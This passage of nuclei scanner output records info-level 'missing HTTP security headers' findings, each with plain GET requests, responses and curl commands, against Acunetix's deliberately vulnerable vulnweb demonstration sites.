Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:59.706815222Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:59.96815292Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:59.968194605Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:59.968225528Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:59.968236577Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:59.968246436Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:00.115147104Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:00.360774779Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n 